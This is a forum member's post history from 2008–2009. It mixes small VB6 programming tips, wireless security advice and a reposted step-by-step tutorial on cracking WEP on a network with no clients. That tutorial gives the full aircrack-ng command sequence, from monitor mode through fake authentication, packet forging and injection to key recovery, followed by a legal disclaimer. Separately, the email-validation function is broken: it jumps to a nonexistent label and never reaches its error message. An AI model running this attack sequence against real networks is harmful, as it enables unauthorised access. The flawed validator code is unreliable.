Jump to content

Check out our Community Blogs


Member Since 27 Jun 2007
Offline Last Active Aug 13 2010 09:17 AM

#509050 Other way to declare Variables using Symbols

Posted by kresh7 on 18 September 2009 - 05:20 AM

Ok this will be a pretty small tutorial ok you know all how to declare variables in vb6 & vb .NET right
Dim TheString as String
Dim Number as Integer

but did you know that you can declare a variable in a much shorter way using symbols like this

Dim TheString$ 'String
Dim TheInt% 'Integer
Dim TheSingle! 'Single
Dim TheDouble# 'Double
Dim TheLong& 'Long
Dim TheCurrency@ 'Currency

so i also commented each line so you know what symbol do what but let me write it down

% - Integer
! - Single
# - Double
& - Long
@ - Currency

Ok this is the tutorial i know realy short but i hope i can get in handle for anyone of you :D Peace out
  • 5

#426960 [VideoTutorial]Adding XP Manifest without ExtraFiles

Posted by kresh7 on 16 January 2009 - 04:34 PM

Hi all today i did a video to show u how to add xp manifest to your applications without extra files all i have used is a Resource Editor called Resource Tuner
but enough talking watch the video its nothing special just thought would be good to post it in here
  • 2

#426690 Easy Email Validation

Posted by kresh7 on 16 January 2009 - 07:15 AM

Hi All today i will show you a Funtion a made to validate email addresses in a string ok im not good at making tutorials so i hope you understand the most :D

ok the funtion looks like this

Public Function ValEmail(mail As String)
If Left(mail, 1) = "@" Then
GoTo NotValide
ElseIf Right(mail, 1) = "@" Then
GoTo NotValide
ElseIf InStr(1, mail, "@") = False Then
MsgBox "The @ is Missing!"
ElseIf InStr(1, mail, ".") = False Then
GoTo NotValide
ElseIf Right(mail, 1) = "." Then
GoTo NotValide
ElseIf Left(mail, 1) = "." Then
GoTo NotValide

'Not Valide
MsgBox "This is Not a Valide Email Address!"
End If
End Function

first part of the funtion like u see is

If Left(mail, 1) = "@" Then
GoTo NotValide

So this part looks for the @ on the first place of the string if the string is in the format @somthing
then its not valide so that the funtion calls the goto funtion and moves to NotValide

Next Part like you see is

ElseIf Right(mail, 1) = "@" Then
GoTo NotValide
its the same as above but this looks from the right if the first char is a @ its again a Invalide Email and again
we call goto

Next Part is

ElseIf InStr(1, mail, "@") = False Then
MsgBox "The @ is Missing!"
This is a easy if stament we use the instr funtion to make a bool statment dont know the right word for it
in english hope you know what i mean so if the instr funtion returns false we know that the @ is missing
and this is again not a valide email address and we then call a msgbox to tell that the @ is missing

Next Part is

ElseIf InStr(1, mail, ".") = False Then
GoTo NotValide
This is again a bool statment that looks for what the funtion returns if instr funtion returns false
we know that a . is missing so its not a valide email address if instr returns a true the . is present so it
an valide email :D **** im not good at making tutorials anyway lets continue

Next Part is

ElseIf Right(mail, 1) = "." Then
GoTo NotValide
ElseIf Left(mail, 1) = "." Then
GoTo NotValide
ive combined both statments here this do just like the first and second part in the tutorial it looks if the first from
right or first from left is a . if yes its not a valide email address.

last part is

MsgBox "This is Not a Valide Email Address!"
End If
This is the error code in case @ is first symbol from left or right or . is first symbol from left or right

Ok wow i never make a tutorial ok this funtion is just a basic one did it within 10 minutes but thought its
worth to post it Copyright of this Funtion NanoXcore thats me with dren,egzon,elban,limi :D
  • 4

#396608 Secure your Wireless Network

Posted by kresh7 on 17 October 2008 - 05:20 AM

Here are a few steps to keep your AP secure.
Remember nothing is unbreakable

[1] Secure your wireless router or access point administration interface

Almost all routers and access points have an administrator password that's needed to log into the device and modify any configuration settings. Most devices use a weak default password like "password" or the manufacturer's name, and some don't have a default password at all. As soon as you set up a new WLAN router or access point, your first step should be to change the default password to something else. You may not use this password very often, so be sure to write it down in a safe place so you can refer to it if needed. Without it, the only way to access the router or access point may be to reset it to factory default settings which will wipe away any configuration changes you've made.

[2] Don't broadcast your SSID

Most WLAN access points and routers automatically (and continually) broadcast the network's name, or SSID (Service Set IDentifier). This makes setting up wireless clients extremely convenient since you can locate a WLAN without having to know what it's called, but it will also make your WLAN visible to any wireless systems within range of it. Turning off SSID broadcast for your network makes it invisible to your neighbors and passers-by (though it will still be detectible by WLAN "sniffers like kismet").

[3] Enable WPA/WPA2 encryption instead of WEP

802.11's WEP (Wired Equivalency Privacy) encryption has well-known weaknesses that make it relatively easy for a determined user with the right equipment to crack the encryption and access the wireless network. A better way to protect your WLAN is with WPA (Wi-Fi Protected Access). WPA provides much better protection and is also easier to use, since your password characters aren't limited to 0-9 and A-F as they are with WEP. WPA support is built into Windows XP (with the latest Service Pack) and virtually all modern wireless hardware and operating systems. A more recent version, WPA2, is found in newer hardware and provides even stronger encryption, but you'll probably need to download an XP patch in order to use it.

[4] Remember that WEP is better than nothing

If you find that some of your wireless devices only support WEP encryption (this is often the case with non-PC devices like media players, PDAs, and DVRs), avoid the temptation to skip encryption entirely because in spite of it's flaws, using WEP is still far superior to having no encryption at all. If you do use WEP, don't use an encryption key that's easy to guess like a string of the same or consecutive numbers. Also, although it can be a pain, WEP users should change encryption keys often-- preferably every week.

[5] Use MAC filtering for access control

Unlike IP addresses, MAC addresses are unique to specific network adapters, so by turning on MAC filtering you can limit network access to only your systems (or those you know about). In order to use MAC filtering you need to find (and enter into the router or AP) the 12-character MAC address of every system that will connect to the network, so it can be inconvenient to set up, especially if you have a lot of wireless clients or if your clients change a lot. MAC addresses can be "spoofed" (imitated) by a knowledgable person, so while it's not a guarantee of security, it does add another hurdle for potential intruders to jump.

[6] Reduce your WLAN transmitter power
You won't find this feature on all wireless routers and access points, but some allow you lower the power of your WLAN transmitter and thus reduce the range of the signal. Although it's usually impossible to fine-tune a signal so precisely that it won't leak outside your home or business, with some trial-and-error you can often limit how far outside your premises the signal reaches, minimizing the opportunity for outsiders to access your WLAN.

[7] Disable remote administration

Most WLAN routers have the ability to be remotely administered via the Internet. Ideally, you should use this feature only if it lets you define a specific IP address or limited range of addresses that will be able to access the router. Otherwise, almost anyone anywhere could potentially find and access your router. As a rule, unless you absolutely need this capability, it's best to keep remote administration turned off. (It's usually turned off by default, but it's always a good idea to check.)

There are many other things you can do but this should get you started.
  • 1

#395032 Game: Give Kresh7 +rep to get CC Tshirt for free :P

Posted by kresh7 on 13 October 2008 - 10:51 AM

thx :$ Xav see lifes goes bether :P
  • -1

#394962 Game: Give Kresh7 +rep to get CC Tshirt for free :P

Posted by kresh7 on 13 October 2008 - 09:45 AM

Ok the game is so :P everyone give me +rep so my reputation total is bigger so i can get a free CC Tshirt :P yeah i know WTF :H ok i know shame one me :H
but i though i give it a try :P
just dont ban me Jordan for this Threat :P its a game
  • -1

#394631 How to Find External IP (Static IP)

Posted by kresh7 on 12 October 2008 - 02:02 PM

Ok i though about writting this cause its pretty simple and its worth of knowing it :D

There are diferrent ways how you can find your External IP (Static IP) Address
One of those ways is here:

Dim MyStaticIP As String
MyStaticIP = Inet1.OpenURL("http://pchelplive.com/ip.php")
Text1.Text = MyIP

Like you see we are using Inet Control to Open The Url http://pchelplive.com/ip.php this is beacuse we retrive the External IP address out of this Page wich is sending use back our a datapacket with our request of our Static IP address
  • 1

#392284 Need help starting an SQL query

Posted by kresh7 on 08 October 2008 - 11:39 AM

Ok i would suggest you to read everything on this page
im not making any marketing for anything but this is the right page :D its not a forum or anything it only teachs you MySQL and a lot of cool stuff i've learned here the most i know about mysql
  • 1

#392136 Using Aireplay to crack into my WEP Network

Posted by kresh7 on 08 October 2008 - 10:07 AM

i think the problem is that you want to hack into a wirless networks with no clients and for that your using backtrack3 right ok here is a post of a friend of mine :D

Monitor Mode

The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can't figure this out, ask down below, or go use google. login to backtrack under root (password 'toor'), and then type "startx" into the command line to start out GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the 'start' type thingy (let me know if I get to technical Smile )

Now, we need to enter this into the command line;

$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6

Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and getting some info ready

ok, lets start airodump so we can get some info out of it, and then we can just leave it running.

$ airodump-ng --ivs --write bob --channel 6 ath1

**basically heres what each thing means;
--ivs= only write the weak IV's, not every packet
--write= the prefix of the file we are writing to, so bob.ivs
--channel= the channel to scan on
ath1= our network device**

Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it'll be in the first column. 2) the essid of the network, i.e. "linksys", or something similar.

Now, open up a new terminal (DON"T CLOSE AIRODUMP). type this line in;

$ export AP=mac_of_ap

Now we also have to get our mac address; this is easy in backtrack just type in the following;


$ macchanger --show ath1

**your output here**
export MAC=your_mac_address

This basically just stored those as variables, so you don't have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network, is fake authorize ourselves using aireplay. Then using the same program, we are going to grab some peices of packets out of the replies given by fakeauth, and use those to create an arp reply packet with packetforge, to inject into the network to create IV's, so we can crack the key! Whew, lets get started!

First we need to set up, but NOT run our fake auth attack;


$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1

so, we are running aireplay attack 1, with no delay, linksys is the essid of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;

$ aireplay-ng -5 -b $AP -h $MAC

Cool, step 1 of 2 is done for getting ready to create IV's, next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it, say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;


Saving Keystream in fragment-0215-124336.xor

**yours will be different**

Now, using this .xor file we can create an arp-reply package which we can inject to create weak IV's. So in the same window we ran the aireplay-ng -5 command, type in the following;


$ packetforge-ng -0 -a $AP -h $MAC -k -l -y your_.xor_file.xor -w arp-request

That will generate what we need, now we can run the final injection command that will inject the arp-request packets. Enter the following;


aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*

Now you get to watch your #data column in airodump (you didn't close it did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!


$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**

There ya go! You have cracked WEP when there are no clients on the network!

**This is an education peice, you should not be cracking anybody elses network, it can get you fined/landed in jail, I take no responsibility for anything you do with this information**

**Obligatory Disclaimer; This tutorial was written 'by watchdog' as an education piece, cracking into somebody else's network is illegal and punishable by fine/jail. Don't be stupid**
  • 1

#383106 Sites hosted on a single IP

Posted by kresh7 on 17 September 2008 - 04:28 PM

Theres a little trick that you can use if you want to see how many sites are hosted on a webserver
First move to Live Search then in the search field put this
IP:<> replace the Ip with the IP of the WebHosting Provider and you will find every site that is hosted on that server
  • 1

#347018 How to make a number generator?

Posted by kresh7 on 01 March 2008 - 06:37 AM

its pretty easy ok heres what you need a textbox and a command button

insert this code on the command button

text1.text = Rnd * 99999999999#

thats all if you use a timer its more intereseting cuz you see how the numbers generat randomly :D
  • 1

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download